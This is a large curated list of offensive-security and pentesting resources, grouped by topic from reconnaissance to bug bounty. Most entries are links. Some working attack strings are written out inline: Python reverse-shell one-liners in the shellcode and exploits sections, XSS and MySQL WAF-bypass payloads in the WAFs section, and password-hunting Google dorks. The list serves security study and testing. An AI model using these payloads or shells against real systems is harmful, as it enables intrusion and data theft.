• Spawning a TTY Shell: Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system.
• LeakLooker: Find Open Databases in Seconds. github
• pown-recon: A powerful target reconnaissance framework powered by graph theory.
• Micro8: The Micro8 series is suitable for junior and intermediate security practitioners, Party B security testing, Party A security self-test, network security enthusiasts, etc., enterprise security protection and improvement, the series complies with: Free, free, shared, open source.
• Payloads All The Things: A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques!
• Penetration Test Guide based on the OWASP + Extra: This guid is for the penetration testers seeking for the appropriate test cases required during a penetration test project. I rearranged the OWASP Testing Guide v4 from my point of view including 9 Test Classes and each class has several Test Cases to conduct against the target. Each Test Case covers several OWASP tests which also is useful for the report document. I've also added 15 extra Tests Cases marked by the EXTRA-TEST. I hope it will be useful in both penetration test projects and bug-bounty.
  • Insecure Direct Object References (OTG-AUTHZ-004)
• OWASP ZAP w2019-10-14 released: pentesting tool for finding vulnerabilities in web applications.
• Order of the Overflow Proxy Service
• liffy: Local file inclusion exploitation tool
• foxyproxy.json: Some of these might be legacy and no longer catching any traffic, but unless you're actually pentesting Mozilla or Google, it shouldn't matter
• pentest_compilation: Compilation of commands, tips and scripts that helped me throughout Vulnhub, Hackthebox, OSCP and real scenarios.
• Linux for Pentester: ZIP Privilege Escalation
• Presentation Clickers: Keystroke injection vulnerabilities in wireless presentation clickers.
• postwoman: alien API request builder - A free, fast, and beautiful alternative to Postman.
• Better API Penetration Testing with Postman:
  • Part 1
  • Part 2
  • Part 3
  • Part 4
• DNS and DHCP Recon using Powershell
• SiteBroker: A cross-platform python based utility for information gathering and penetration testing automation!
• PENTESTING-BIBLE: This repository was created and developed by Ammar Amer @cry__pto Only. Updates to this repository will continue to arrive until the number of links reaches 10000 links & 10000 pdf files .Learn Ethical Hacking and penetration testing .hundreds of ethical hacking & penetration testing & red team & cyber security & computer science resources.
• Nikto: web server scanner.
• Nikto: A Practical Website Vulnerability Scanner
• NetAss2: Network Assessment Assistance Framework.
• CSS Injection Primitives
• physical-docs: This is a collection of legal wording and documentation used for physical security assessments. The goal is to hopefully allow this as a template for other companies to use and to protect themselves when conducting physical security assessments.
• pentest-tools: Custom pentesting tools.
• HACKING WITH ENVIRONMENT VARIABLES: Interesting environment variables to supply to scripting language interpreters
• rootend: A *nix Enumerator & Auto Privilege Escalation tool.
• DroneSploit: Drone pentesting framework console.
• HAck Tricks(Pentesting Methodology): Here you will find the typical flow that you should follow when pentesting one or more machines.
• Huawei_Thief: Huawei DG8045 & HG633 Devices Exploitation Tool
• urldozer: Perform operations on URLs like extracting paths, parameter names and/or values, domain name, host name (without HTTP[s]).
• Pentesting Cheatsheets
• Snaffler: a tool for pentesters to help find delicious candy, by @l0ss and @Sh3r4 ( Twitter: @/mikeloss and @/sh3r4_hax )
• Several ways to download and execute malicious codes (LOLBAS)
  • coregen.exe
• Jok3r: Network and Web Pentest Automation Framework. site
• Penetration Testing Cheat Sheet
• BBT- Bug Bounty Tools
• P4wnP1 A.L.O.A. by MaMe82 is a framework which turns a Rapsberry Pi Zero W into a flexible, low-cost platform for pentesting, red teaming and physical engagements ... or into "A Little Offensive Appliance".
• AriaCloud: A Docker container for remote penetration testing.
• RustScan: The Modern Day Port Scanner.
• Impacket: is a collection of Python classes for working with network protocols.
• fiddler: Capturing web traffic logs
• SecLists: is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
• 21 - Pentesting FTP
• PwnWiki.io is a collection TTPs (tools, tactics, and procedures) for what to do after access has been gained. The notes section of the pentesters mind.
• post-exploitation: Post Exploitation Collection.
• Proxyjump, the SSH option you probably never heard of
• GLORP: A CLI-based HTTP intercept and replay proxy
• Sec4US's cheatsheets: a lot of cheatsheets about shellcoding and bufferoverflow.
• Pentesting 101: Working With Exploits
• SMB AutoRelay: SMB Auto Relay provides the automation of SMB/NTLM Relay technique for pentesting and red teaming exercises in active directory environments.
• Decoder++: An extensible application for penetration testers and software developers to decode/encode data into various formats.
• SCShell: Fileless lateral movement tool that relies on ChangeServiceConfigA to run command.
• bulwark: An organizational asset and vulnerability management tool, with Jira integration, designed for generating application security reports.
• A Noob Guide to setup your Own OOB DNS Server: Out-of-Band DNS Bind Server: A Bind9 server for pentesters to use for Out-of-Band vulnerabilities.
• Interactsh: An OOB interaction gathering server and client library.
• DNSLOG: dnslog dns / dns rebinding platform.
• Pre-engagement
• pentest, should I do it?
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• Weird Proxies: Reverse proxies cheatsheet
• Install the Microsoft signed Hybrid Connection Manager on victim host, link it up with your Azure app, enjoy persistent access to the on-prem network from your Azure portal.
• pwncat: netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE)
• From Python to .Net
• offensiveph: use old Process Hacker driver to bypass several user-mode access controls.
• Penetration Testing - An Introduction by cirl.lu.
• mitmproxy: An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.
• Poor Man's Pentest: This a collection of the code that I have written for the Poor Man's Pentest presentation.
• Operator's Decalogue
• Living Off Trusted Sites (LOTS) Project: Attackers are using popular legitimate domains when conducting phishing, C&C, exfiltration and downloading tools to evade detection. The list of websites below allow attackers to use their domain or subdomain.
• Filesec.io: Stay up-to-date with the latest file extensions being used by attackers.
• EMBArk: The firmware security scanning environment
• EMBA: The security analyzer for embedded device firmware.
• OffensiveNim: My experiments in weaponizing Nim.
• White Box Penetration Testing: “Cheating” in order to boost impact and value
• Python Penetration Testing Cheat Sheet

Reconnaissance

• Automated Reconnaissance Pipeline: An automated target reconnaissance pipeline.
• PERFORMING DOMAIN RECONNAISSANCE USING POWERSHELL
• subfinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing.
• urlhunter: a recon tool that allows searching on URLs that are exposed via shortener services
• URLBrute: Directory/Subdomain scanner developed in GoLang.
• degoogle: search Google and extract results directly. skip all the click-through links and other sketchiness.
• Investigator: An online handy-recon tool.

Enumeration

• linux-smart-enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levels
• Ethical Hacking Course: Enumeration Theory
• Sublist3r: Fast subdomains enumeration tool for penetration testers
• subscraper: External pentest tool that performs subdomain enumeration through various techniques. In addition, SubScraper will provide information such as HTTP & DNS lookups to aid in potential next steps.
• massh-enum: OpenSSH 7.x Mass Username Enumeration.
• LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
• linpostexp: Linux post exploitation enumeration and exploit checking tools
• Social Mapper - A Social Media Enumeration & Correlation Tool. github repo
• The art of subdomain enumeration: This repository contains all the supplement material for the book "The art of sub-domain enumeration".
• social_mapper: A Social Media Enumeration & Correlation Tool by Jacob Wilkin(Greenwolf)
• LEGION - Automatic Enumeration Tool
• discover - Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
• Z/OS System Enumeration Scripts: PoC REXX Script to Help with z/OS System enumeration via OMVS/TSO/JCL.
• WPExploitation: simples scripts to help windows enumeration.
• CTFR does not use neither dictionary attack nor brute-force, it just abuses of Certificate Transparency logs.
• feroxbuster: A fast, simple, recursive content discovery tool written in Rust.
• grinder: Python framework to automatically discover and enumerate hosts from different back-end systems (Shodan, Censys)
• Admin-Scanner: This tool is to design to find admin panel of websites.
• Virtual host scanner: A script to enumerate virtual hosts on a server.
• vhost-brute: A PHP tool to brute force vhost configured on a server.
• grab_beacon_config: nmap strip to get beacon info.
• assetfinder: Find domains and subdomains related to a given domain.
• Wordlists:
  • hackerone_wordlist: The wordlists that have been compiled using disclosed reports at HackerOne bug bounty platform
  • paths wordlists
  • subdomains wordlists
  • parameters wordlists
  • How to Roll a Strong Password with 20-Sided Dice and Fandom-Inspired Wordlists
  • Assetnote Wordlists: When performing security testing against an asset, it is vital to have high quality wordlists for content and subdomain discovery.
  • Duplicut: Remove duplicates from MASSIVE wordlist, without sorting it (for dictionary-based password cracking)
  • Weakpass rule-based online generator to create a wordlist based on a set of words entered by the user. Kraker is a distributed password brute-force system that focused on easy use.
  • Collection of some common wordlists such as RDP password, user name list, ssh password wordlist for brute force. IP Cameras Default Passwords.
  • Default IoT Username/password
  • Elpscrk: An Intelligent wordlist generator based on user profiling, permutations, and statistics. (Named after the same tool in Mr.Robot series S01E01).
• Ghost Eye Informationgathering Footprinting Scanner and Recon Tool Release. Ghost Eye is an Information Gathering Tool I made in python 3. To run Ghost Eye, it only needs a domain or ip. Ghost Eye can work with any Linux distros if they support Python 3. Author: Jolanda de Koff
• SuperEnum: This script does the basic enumeration of any open port along with screenshots.
• Domain Dossier: The Domain Dossier tool generates reports from public records about domain names and IP addresses to help solve problems, investigate cybercrime, or just better understand how things are set up.
• X41 BeanStack: Java Fingerprinting using Stack Traces
• Skanuvaty: Dangerously fast DNS/network/port scanner.
• TireFire: Automate the scanning and enumeration of machines externally while maintaining complete control over scans shot to the target. Comfortable GUI-ish platform. Great for OSCP/HTB type Machines as well as penetration testing.
• OS Fingerprinting using NTP

WebShells

• novahot:A webshell framework for penetration testers.
• Weevely: Weaponized web shell
• Did you know that Python's simple web server can run CGI scripts
• Web-Shells: (mostly php)

ShellCodes

• Why is My Perfectly Good Shellcode Not Working?: Cache Coherency on MIPS and ARM.
• shellcode2asmjs: Automatically generate ASM.JS JIT-Spray payloads
• Shellen:Interactive shellcoding environment to easily craft shellcodes
• C-S1lentProcess1njector: Process Injector written in C that scans for target processes, once found decrypts RC4 encrypted shellcode and injects/executes in target process' space with little CPU & Memory usage.
• Windows:
  • Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory.
  • pe_to_shellcode: Converts PE into a shellcode
  • stager.dll: Code from this article
  • ThreadBoat: Program uses Thread Execution Hijacking to Inject Native Shellcode into a Standard Win32 Application
  • Excel4-DCOM: PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe).
  • MaliciousMacroMSBuild: Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.
  • SnapLoader: Injecting shellcode into 'ntdll.dll' address space in target process, and hijacking its thread without calling GetThreadContext, evading memory scanners, and more ...
• Linux:
  • Linux x86 Reverse Shell Shellcode
  • mem-loader.asm: Fun little loader shellcode that executes an ELF in-memory using an anonymous file descriptor (inspired by x-c3ll
• Shellab: Linux and Windows shellcode enrichment utility
• ShellcodeWrapper: Shellcode wrapper with encryption for multiple target languages
• Fully (auto) interactive TTY shells
• Reverse Shell:
  • I saw a python reverse shell, thought it looked a little long (215 chars), so I came up with my own! (107/98 ch): nc -lnvp 1234 / python3 -c "# 107, single statement, non-blocking import("subprocess").Popen("sh",0,None,*[ import("socket").create_connection(("127.0.0.1",1234))]3)" or "# 98, separators, blocking import subprocess as S,socket; S.run("sh",0,None,[ socket.create_connection(("127.0.0.1",1234))]*3)"
  • python-pty-shells: Python PTY backdoors - full PTY or nothing!
  • Powershell HTTP/S Reverse Shell: Powershell reverse shell using HTTP/S protocol with AMSI bypass and Proxy Aware.
  • HTTP/S Asynchronous Reverse Shell: (POC) Asynchronous reverse shell using the HTTP protocol.
  • powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
  • Reverse Shell Cheat Sheet
  • Reverse Shell Generator repo
  • How to Execute Shell Commands with Python
  • Reverse Shell to fully interactive
  • Single-Line Web Shell
  • Simple-Backdoor-One-Liner.php
  • reverse shell
  • Spawning reverse shells
  • Spawning interactive reverse shells with TTY
  • Reverse Shell Cheat Sheet
  • shellver: Reverse Shell Cheat Sheet TooL
  • GTRS: GTRS - Google Translator Reverse Shell
  • Using tmux for automating interactive reverse shells
• USING A C# SHELLCODE RUNNER AND CONFUSEREX TO BYPASS UAC WHILE EVADING AV
• New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!
• (pt-br) Usando a pwntools para Binary Exploitation
• CallObfuscator: Obfuscate specific windows apis with different apis
• vba-obfuscator: 2018 School project - PoC of malware code obfuscation in Word macros
• ProcessInjection: This program is designed to demonstrate various process injection techniques.
• Ten process injection techniques: A technical survey of common and trending process injection techniques
• shellcoding using env variables
• From a C project, through assembly, to shellcode
• Writing and Compiling Shellcode in C
• Using ICMP to deliver shellcode
• Buffer Overflow Windows - EGGHUNTER cheatsheet.
• metasploit, x86/alpha_mixed and Windows 7 are killing me
• Some lessons learned along the way to Buffer Overflow
• Windows 10 Exploit Development Setup - Vulnserver Walkthrough Part 1
• Resolving API addresses in memory
• Locating Kernel32 Base Address
• Finding Kernel32 Base and Function Addresses in Shellcode
• Basics of Windows shellcode writing
• Shellcodes database for study cases
• Return Oriented Programming (ROP) Attacks
• Gadgets:
  • ROPgadget Tool
  • RETURN ORIENTED PROGRAMMING (ROP)
  • ROP Gadget Prevalence and Survival under Compiler-based Binary Diversification Schemes
  • one_gadget: The best tool for finding one gadget RCE in libc.so.6.
  • JOP ROCKET: The Jump-oriented Programming Reversing Open Cyber Knowledge Expert Tool, or JOP ROCKET, is a tool designed to help facilitate JOP gadget discovery in an x86 Windows environment.
• A fun trick for running shellcode directly from bash
• Polyglot Assembly: Writing assembly code that runs on multiple architectures.
• Shellcode Injection Techniques: A collection of C# shellcode injection techniques. All techniques use an AES encrypted meterpreter payload. I will be building this project up as I learn, discover or develop more techniques. Some techniques are better than others at bypassing AV.
• Simple Shellcode Tale! Segmentation Fault ao executar o shellcode
• Linux x86 execve("/bin/sh") - 28 bytes
• ShellCode Tester: An application to test windows and linux shellcodes.
• Windows/x86 Dynamic Bind Shell / Null-Free Shellcode
• Core: Core bypass Windows Defender and execute any binary converted to shellcode.
• (pt-br) Encontrando endereço da função dinamicamente. Análise da biblioteca block_api
• Ninja UUID Shellcode Runner: Module Stomping, No New Thread, HellsGate syscaller, UUID Shellcode Runner for x64 Windows 10!
• IPFuscator: A tool to automatically generate alternative IP representations
• Shellcode Mutator: Mutate nasm assembly source files using no-instruction sets (such as nops) to avoid signatures.

Reporting

• public-pentesting-reports. Curated list of public penetration test reports released by several consulting firms and academic security groups
• report-ng: Generate MS Word template-based reports with HP WebInspect / Burp Suite Pro input, own custom data and knowledge base.
• PandocPentestReport: This repository shows my effort to create a pandoc based pentest report template.
• Technical Report template: LaTeX template for technical reports
• TryHackMe. Breaking Into the Kenobi Machine.
• PwnDoc: PwnDoc is a pentest reporting application making it simple and easy to write your findings and generate a customizable Docx report.
• This is how you can deliver true value through your pentest reports
• Offensive Security Exam Report Template in Markdown: Markdown Templates for Offensive Security OSCP, OSWE, OSCE, OSEE, OSWP exam report.
• A List of Post-mortems!: A collection of postmortems. Sorry for the delay in merging PRs!

OSINT - Open Source INTelligence

• Slides from my ShellCon Talk, OSINT for Pen Tests, given 10/19.
• OSINT tool for visualizing relationships between domains, IPs and email addresses.
• sn0int: Semi-automatic OSINT framework and package manager
• A Pentester’s Guide – Part 1: OSINT – Passive Recon and Discovery of Assets
• A Pentester’s Guide - Part 2: OSINT – LinkedIn is Not Just for Jobs
• iKy: I Know You (OSINT project)
• Gitrob: Putting the Open Source in OSINT
• OSint Tools: On this page you’ll find tools which you can help do your OSINT reseach.
• datasploit: An #OSINT Framework to perform various recon techniques on Companies, People, Phone Number, Bitcoin Addresses, etc., aggregate all the raw data, and give data in multiple formats.
• the-endorser: An OSINT tool that allows you to draw out relationships between people on LinkedIn via endorsements/skills.
• OSINT-y Goodness: HathiTrust Digital Library
• OSINT Resources for 2019
• Awesome OSINT: 😱 A curated list of amazingly awesome OSINT
• OSINT-y Goodness, №14 - Directory of Open Access Journals
• Twitter Analysis: Identifying A Pro-Indonesian Propaganda Bot Network
• TWINT: An advanced Twitter scraping & OSINT tool written in Python that doesn't use Twitter's API, allowing you to scrape a user's followers, following, Tweets and more while evading most API limitations.
• Breaking Mimblewimble’s Privacy Model: Mimblewimble’s privacy is fundamentally flawed. Using only $60/week of AWS spend, I was able to uncover the exact addresses of senders and recipients for 96% Grin transactions in real time.
• snscrape: A social networking service scraper in Python
• Hack the planet with ꓘamerka GUI — Ultimate Internet of Things/Industrial Control Systems reconnaissance tool. twitter announcement, github. ICS/IoT search: ꓘamerka. Kamerka OSINT tool shows your country's internet-connected critical infrastructure
• dmi-tcat/Digital Methods Initiative - Twitter Capture and Analysis Toolset.
• KnockKnock: A simple reverse whois lookup CLI which allows you to find domain names owned by an individual person or company, often used for Open Source Intelligence (OSINT) purposes.
• From email to phone number, a new OSINT approach
• recox: Master script for web reconnaissance
• openSquat is an opensource Intelligence (OSINT) R&D project to identify cyber squatting threats to specific companies or domains, such as domain squatting, typo squatting, IDN homograph attacks, phishing and scams.
• Trace Labs Kali Linux build configuration: Trace Labs OSINT Linux Distribution based on Kali.
• natlas: Scaling Network Scanning. Changes prior to 1.0 may cause difficult to avoid backwards incompatibilities. You've been warned.
• sifter: is a osint, recon & vulnerability scanner. It combines a plethara of tools within different module sets in order to quickly perform recon tasks, check network firewalling, enumerate remote and local hosts, and scan for the 'blue' vulnerabilities within microsft and if unpatched, exploit them.
• Kitsune: An artificial neural network to detect automated Twitter accounts (bots).
• Image "Cloaking" for Personal Privacy. Fawkes: Protecting Privacy against Unauthorized Deep Learning Models
• (pt-br) OSINT-Brazuca: Repositório criado com intuito de reunir informações, fontes(websites/portais) e tricks de OSINT dentro do contexto Brasil.
• WhatsMyName: This tool allows you to enumerate usernames across many websites.
  • Maltego Transforms for WhatsMyName
• shadowbanned: Shadowban Tester for Twitter code
• sherlock: Hunt down social media accounts by username across social networks
• usufy is a GPLv3+ piece of software that checks the existence of a profile for a given user in a bunch of different platforms. It uses the error messages displayed by most platforms when a user profile has not been found as the evidence of the existence or not of a given profile.
• osrf: OSRFramework, the Open Sources Research Framework is a AGPLv3+ project by i3visio focused on providing API and tools to perform more accurate online researches.
• IntelMQ: A tool-suite solution for IT security teams (CERTs & CSIRTs, SOCs abuse departments, etc.) for collecting and processing security feeds using a message queuing protocol. Its main goal is to give to incident responders an easy way to collect & process threat intelligence thus improving the incident handling processes of CERTs.
• (ru) OSINT SAN Framework.: OSINT-SAN Framework makes it possible to quickly find information and de-anonymize Internet users. The software is a framework that contains 30 functions for searching information or de-anonymizing users. With the help of my software, you can collect information about users on the Internet, anonymously and without special skills.
• Scrummage: The Ultimate OSINT and Threat Hunting Framework.
• viper: Intranet pentesting tool with webui 开源图形化内网渗透工具
• ⡷⠂𝚔𝚊𝚛𝚖𝚊 𝚟𝟸⠐⢾ is a Passive Open Source Intelligence (OSINT) Automated Reconnaissance (framework)
• 3WiFi: Free Wireless Database. repo
• Stealth plane in flight
• ExportData - Twitter data export tool. Allows downloading historical tweets since 2006, exporting followers & followings and collects historical trends in 467 locations.
• DetectDee: Hunt down social media accounts by username, email or phone across social networks.

OSINT Webscraping

• OSINT framework focused on gathering information from free tools or resources.

• h8mail: Password Breach Hunting & Email OSINT tool, locally or using premium services. Supports chasing down related email

• PwnBin: Python Pastebin Webcrawler that returns list of public pastebins containing keywords

• ODBParser: OSINT tool to search, parse and dump only the open Elasticsearch and MongoDB directories.

• pastego: Scrape/Parse Pastebin using GO and expression grammar (PEG)

• Instagram Scraper: Scrapes an instagram user's photos and videos

• galer: A fast tool to fetch URLs from HTML attributes by crawl-in.

• How to bypass CloudFlare bot protection ?

• SpyScrap: CLI and GUI for OSINT. Are you very exhibited on the Internet? Check it! Twitter, Tinder, Facebook, Google, Yandex, BOE. It uses facial recognition to provide more accurate results.F

• pwnedOrNot OSINT Tool for Finding Passwords of Compromised Email Addresses.

• dorking (how to find anything on the Internet)

• Complete Google Dorks List in 2020 For Ethical Hacking and Penetration Testing

• Some google Dorks examples: ```# example site:trello.com intext:password

  "Please log in with router's password"
  ```
  

• The closer a username/email address resembles other username/email addresses associated w/ a target, the easier it is to find (or guess &/or 'bruteforce') other usernames/email addresses associated w/ that target.

• DorkGenius: Generate custom dorks for Google, Bing, DuckDuckGo, & more!

OSINT Chats

• chatter: internet monitoring osint telegram bot for windows
• Slackhound: Slackhound allows red and blue teams to perform fast reconnaissance on Slack workspaces/organizations to quickly search user profiles, locations, files, and other objects.
• ail-feeder-telegram: External telegram feeder for AIL framework.
• MODIFYING TELEGRAM'S "PEOPLE NEARBY" FEATURE TO PINPOINT PEOPLE'S HOMES
• signald: unofficial daemon for interacting with Signal
• Telegram messenger CLI: telegram-cli for Telegram IM.
• TelegramScraper: Telegram scraping tool for researching mis-/disinformation and investigating shade goings on.
• OSINT-Discord-resources: Some OSINT Discord resources.

Vulnerability

• Striker is an offensive information and vulnerability scanner
• SQL Vulnerability Scanner
• Decentralized Application Security Project, github
• Introduction to IDAPython for Vulnerability Hunting — Somerset Recon
• Beating the OWASP Benchmark
• CMSScan: Scan Wordpress, Drupal, Joomla, vBulletin websites for Security issues.
• Meteor Blind NoSQL Injection
• Security Bulletins that relate to Netflix Open Source
• tsunami-security-scanner: Tsunami is a general purpose network security scanner with an extensible plugin system for detecting high severity vulnerabilities with high confidence.
• Testing docker CVE scanners. Part 2.5 — Exploiting CVE scanners, repo
• New NAT/Firewall Bypass Attack Lets Hackers Access Any TCP/UDP Service. NAT Slipstreaming allows an attacker to remotely access any TCP/UDP services bound to a victim machine, bypassing the victim’s NAT/firewall, just by the victim visiting a website. there is a version 2. video: Understanding Nat Slipstreaming
• openVulnQuery: A Python-based client for the Cisco openVuln API
• HellRaiser: Vulnerability Scanner
• Open-Source Vulnerability Intelligence Center: PatrowlHears - Vulnerability Intelligence Center / Exploits
• Vagrant GVM/Openvas: GVM/Openvas vulnerability scanner in Alpine with Vagrant.
• How to Have a Cybersecurity Graph Database on Your PC
• On the Security Vulnerabilities of Text-to-SQL Models

WAFs

• Web Application Penetration Testing Course URLs
• Web Application Penetration Testing Notes
• quarantyne: Modern Web Firewall: stop account takeovers, weak passwords, cloud IPs, DoS attacks, disposable emails
• Sitadel: Web Application Security Scanner.
• WAF through the eyes of hackers
• Some nice payloads to bypass XSS WAF:

    '';!--"<XSS>=&{()}
    <IMG SRC="javascript:alert('XSS');">
    <IMG SRC="jav&#x09;ascript:alert('XSS');">
    <IMG SRC="jav&#x0A;ascript:alert('XSS');">
    <IMG SRC="jav&#x0D;ascript:alert('XSS');">
    <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

• CloudFlare XSS Bypass:

<svg
onload=alert%26%230000000040
"1")>

• Some MySQL tricks to break some #WAFs out there.

SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`

• another one:

jaVasCript:/*-/*`/*\`/*'/*"/**/( oNcliCk=alert() )//%0D%0a%0d%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

• bypassing moderning web application firewalls
• WAFW00F allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website.
• Bypassing Cloudflare WAF with the origin server IP address
• WAF-Hook
• How to find real IP of a site behind cloudflare.
  • Cloudfail tool
  • Securitytrails historical data
  • Sent email on non-existent email with hope to receive back real ip in header
  • Shadowcrypt Cloudflare resolve
  • Behindflare tool
  • Builtwith relationship
  • Crt.sh/Censys cert lookup
  • Zoomeye/Shodan
  • Intelx.io pastes for the domain
  • Wordpress technique
  • Maybe historical whois will show the originating IP. Some people add CloudFlare AFTER the site is set up. I 'd try RiskIQ...I've had better luck than with SecurityTrails. You can also try FarSight, Shodan, BinaryEdge, and ZoomEye to see if you can find anything.
• A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection

Exploits

• IOSurface exploit
• Attacking a co-hosted VM: A hacker, a hammer and two memory modules
• How To Create a Metasploit Module
• Installing Metasploit Pro, Ultimate, Express, and Community
• unfurl, An Entropy-Based Link Vulnerability Analysis Tool
• A collection of vulnerable ARM binaries for practicing exploit development
• A collection of PHP exploit scripts
• Sage ACF Blocks: A Sage 10 helper package for building ACF blocks rendered using blade templates.
• WebKit exploit
• Modern Binary Exploitation - Spring 2015
• (video) Python 2 vs 3 for Binary Exploitation Scripts
• DriveCrypt: DriveCrypt Dcr.sys vulnerability exploit
• Faxploit: Sending Fax Back to the Dark Ages
• beebug: A tool for checking exploitability
• NAVEX: Precise and scalable exploit generation for dynamic web applications
• Three New DDE Obfuscation Methods
• SILENTTRINITY: A post-exploitation agent powered by Python, IronPython, C#/.NET
• fuxploider: File upload vulnerability scanner and exploitation tool.
• Jailbreaks Demystified – GeoSn0w – Programmer. Hacking stuff.
• Attacking Google Authenticator
• Pacu: The AWS exploitation framework, designed for testing the security of Amazon Web Services environments. installation guide, starting guide
• Glibc Heap Exploitation Basics:
  • Introduction to ptmalloc2 internals (Part 1)
  • ptmalloc2 internals (Part 2) - Fast Bins and First Fit Redirection
• movfuscator: The single instruction C compiler
• beebug: A tool for checking exploitability
• UEFI vulnerabilities classification focused on BIOS implant delivery and What makes OS drivers dangerous for BIOS?
• MikroTik Firewall & NAT Bypass
• 3D Accelerated Exploitation: The content of this repository is meant to be the official release of the tooling/exploit that was discussed during the OffensiveCon 2019 talk - 3D Accelerated Exploitation. The talk dealt with research into the VirtualBox 3D Acceleration feature, which is backed by a software component called Chromium.
• GhostDelivery: Python script to generate obfuscated .vbs script that delivers payload (payload dropper) with persistence and windows antivirus disabling functions.
• Beat the hole in the ATM: hacking an diebold ATM.
• RedGhost: Linux post exploitation framework designed to assist red teams in gaining persistence, reconnaissance and leaving no trace.
• PowerSploit: is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.
• Z-Shave. Exploiting Z-Wave downgrade attacks
• Totally Pwning the Tapplock Smart Lock - Andrew Tierney 13 Jun 2018
• I found myself in need of a much shorter python reverse oneliner than shellpop provides by default. Here's what I landed on. 🙃: python -c "import pty,socket;h,p='192.168.200.1',12345;socket.create_connection((h,p));pty.spawn('/bin/sh');"
• The Art of WebKit Exploitation
• PEASS: Privilege Escalation Awesome Scripts SUITE.
• Patchless AMSI bypass using SharpBlock
  • Lets Create An EDR… And Bypass It! Part 1
  • Lets Create An EDR… And Bypass It! Part 2
  • SharpBlock: A method of bypassing EDR's active projection DLL's by preventing entry point exection. SylantStrike: Simple EDR implementation to demonstrate bypass.
• Bypassing Antivirus with Golang – Gopher it!
• The Invoke-CradleCrafter Overview
• DVS: D(COM) V(ulnerability) S(canner) AKA Devious swiss army knife - Lateral movement using DCOM Objects.
• The Exploit Database Git Repository
• Vulnerability Lab: helps with the world's first independent bug bounty hacker community. Leverage their skills and creativity to surface your critical vulnerabilities before criminals can exploit them.
• 0day.Today: Biggest Exploits Database and 0day market - The Underground, is one of the world's most popular and comprehensive computer security web sites.
• cxsecurity: is an open project developed and moderated fully by one independent person.
• Security Focus
• packet storm: Exploit Files
• Graphology of an Exploit: Hunting for exploits by looking for the author’s fingerprints
• Traditional Buffer Overflow Windows cheatsheet
• Exploit writing tutorial part 3 : SEH Based Exploits
• Vulnerability DB: Detailed information and remediation guidance for known vulnerabilities.
• mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse.
• Script to decode .vbe files
• A First Introduction to System Exploitation
• AllPocsFromHackerOne: This script grabs public report from hacker one and download all JSON files to be grepable.
• How I Found My First Ever ZeroDay (In RDP)
• Learning Linux Kernel Exploitation: Part 1, Part 2
• SharpSelfDelete: C# implementation of the research by @jonaslyk and the drafted PoC from @LloydLabs
• preeny: Some helpful preload libraries for pwning stuff.
• Exploits, Vulnerabilities and Payloads: Practical Introduction
• Beginners Guide to 0day/CVE AppSec Research
• 0days In-The-Wild - Hello! This site aims to be a central repository for information about 0-days exploited in-the-wild! It's maintained by Google Project Zero.
• Sticky notes for pentesting. repo

Payloads

• Payloads Collection by @alra3ees:
  • Command Injection Payload List
  • Cross Site Scripting (XSS) Vulnerability Payload List
  • XML External Entity (XXE) Injection Payload List: XML External Entity (XXE) Injection Payload List
  • SQL Injection Payload List: SQL Injection Payload List
  • Some SQL Injection Bypassing
  • RFI/LFI Payload List.
  • Open Redirect Payload List
• MSFVenom:
  • (pt-br) Criando Payloads de Shell Reverso com MSFVenom
  • MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)
  • MSFVenom - CheatSheet
  • Hiding Metasploit Shellcode to Evade Windows Defender
  • Creating Metasploit Payloads
  • Shikata Ga Nai Encoder Still Going Strong
  • BYPASSING ANTIVIRUS WITH MSFVENOM
  • MSFVenom Cheatsheet
• Payload Delivery for DevOps: Building a Cross-Platform Dropper Using the Genesis Framework, Metasploit and Docker. code
• LaTex Injection
• Hiding malicious code with “Module Stomping”: Part 1. ModuleStomping
• Phantom-Evasion: Python antivirus evasion tool.
• Steganography: Least Significant Bit Steganography for bitmap images (.bmp and .png), WAV sound files, and byte sequences. Simple LSB Steganalysis (LSB extraction) for bitmap images.
• PyFuscation: Obfuscate powershell scripts by replacing Function names, Variables and Parameters.
• Starting a handler with Metasploit
• Reverse Shell Cheat Sheet
• System Calls: An example of using Syscalls in C# to get a meterpreter shell.

Bug Bounty

• Awesome one-liner bug bounty local copy
• bbrecon Python library and CLI for the Bug Bounty Recon API
• RPC Bug Hunting Case Studies – Part 1
• Top Penetration Testing & Bug Hunting YouTube Channels you should follow - Updated 11/19/2020
• Our top tips for better bug bounty reports, plus a hacker contest!
• axiom: The dynamic infrastructure framework for anybody!
• KindleDrip: From Your Kindle’s Email Address to Using Your Credit Card.
• Amazon Kindle Vulnerabilities Could Have Led Threat Actors to Device Control and Information Theft
• This #OneLiner extracts all API endpoints from AngularJS & Angular javascript files:

